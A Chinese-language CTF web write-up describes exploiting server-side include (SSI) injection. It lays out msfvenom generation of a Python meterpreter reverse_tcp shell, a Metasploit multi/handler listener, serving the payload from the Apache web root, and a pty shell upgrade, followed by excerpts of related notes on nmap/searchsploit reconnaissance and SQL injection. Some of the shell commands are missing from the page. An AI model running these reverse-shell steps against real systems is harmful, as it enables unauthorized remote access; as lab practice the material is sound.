ctf web SSI注入思路筆記

2022-07-02 06:39:09 字數 1028 閱讀 9239

發現開放http服務,開啟網頁查詢敏感檔案,發現疑似存在命令注入漏洞

列舉當前目錄中的檔案和目錄:

切換到指定目錄:

給shell賦予可執行許可權::

執行shell.py:

php的shell:

python的shell

生成:msfvenom –p python/meterpreter/reverse_tcp lhost=本地ip lport=4444  -f raw > /root/desktop/shell.py

啟動監聽:

開啟msfconsole

use exploit/multi/handler

set payload  python/meterpreter/reverse_tcp

show options

set lhost  本地ip

run移動shell.py到apache的根目錄下:mv shell.py /var/www/html

開啟apache :service apache2 start

檢視開啟狀態:service apache2  status

sysinfo檢視系統資訊

shell進入系統shell

優化終端python -c'import pty;pty.spawn( "/bin/bash」)'

當發現.stm,.shtm .shtml就要想到是否存在ssi注入漏洞,發現漏洞,找**可以輸入的地方,製作shell,啟動msf的監聽,通過**可輸入地方進行執行cmd命令,執行shell,獲得**,測試執行,python優化終端顯示,進入根目錄,檢視flag

ctf web FTP思路筆記

資訊探測 nmap掃瞄發現主機服務資訊 掃瞄主機服務及服務版本 nmap sv 靶機ip位址 快速掃瞄主機全部資訊 nmap t4 a v 靶機位址 分析掃瞄結果 查詢漏洞是否有可利用資訊 seachsploit 服務版本 檢視漏洞資訊,找到可利用的溢位 發現metasploit已經整合了該漏洞 展...

SQL注入學習總結 三 SQL注入的思路總結

ctf中的sql注入的思路總結 1.拿到題目之後一般是乙個登陸框 大概率盲注或者是報錯,寫指令碼跑 嘗試輸入使用者名稱 admin 和密碼 隨意 檢視其返回結果這裡一般又分為兩種 有返回是密碼錯誤還是使用者名稱錯誤 只是單一的返回登陸失敗 對於第一種情況就可以直接嘗試在username之後輸入pay...

SQL注入之ACCESS注入筆記

以.mdb字尾命名 乙個檔案就是乙個庫,和mysql不同 開啟方式用office或者第三方工具 表名 欄位名 資料內容step1 判斷注入是否存在 step2 猜解表名 step3 猜解字段數 step4 猜解欄位名 step5 猜解內容長度 step6 猜解內容 單引號報錯,因為在sql語句中單引...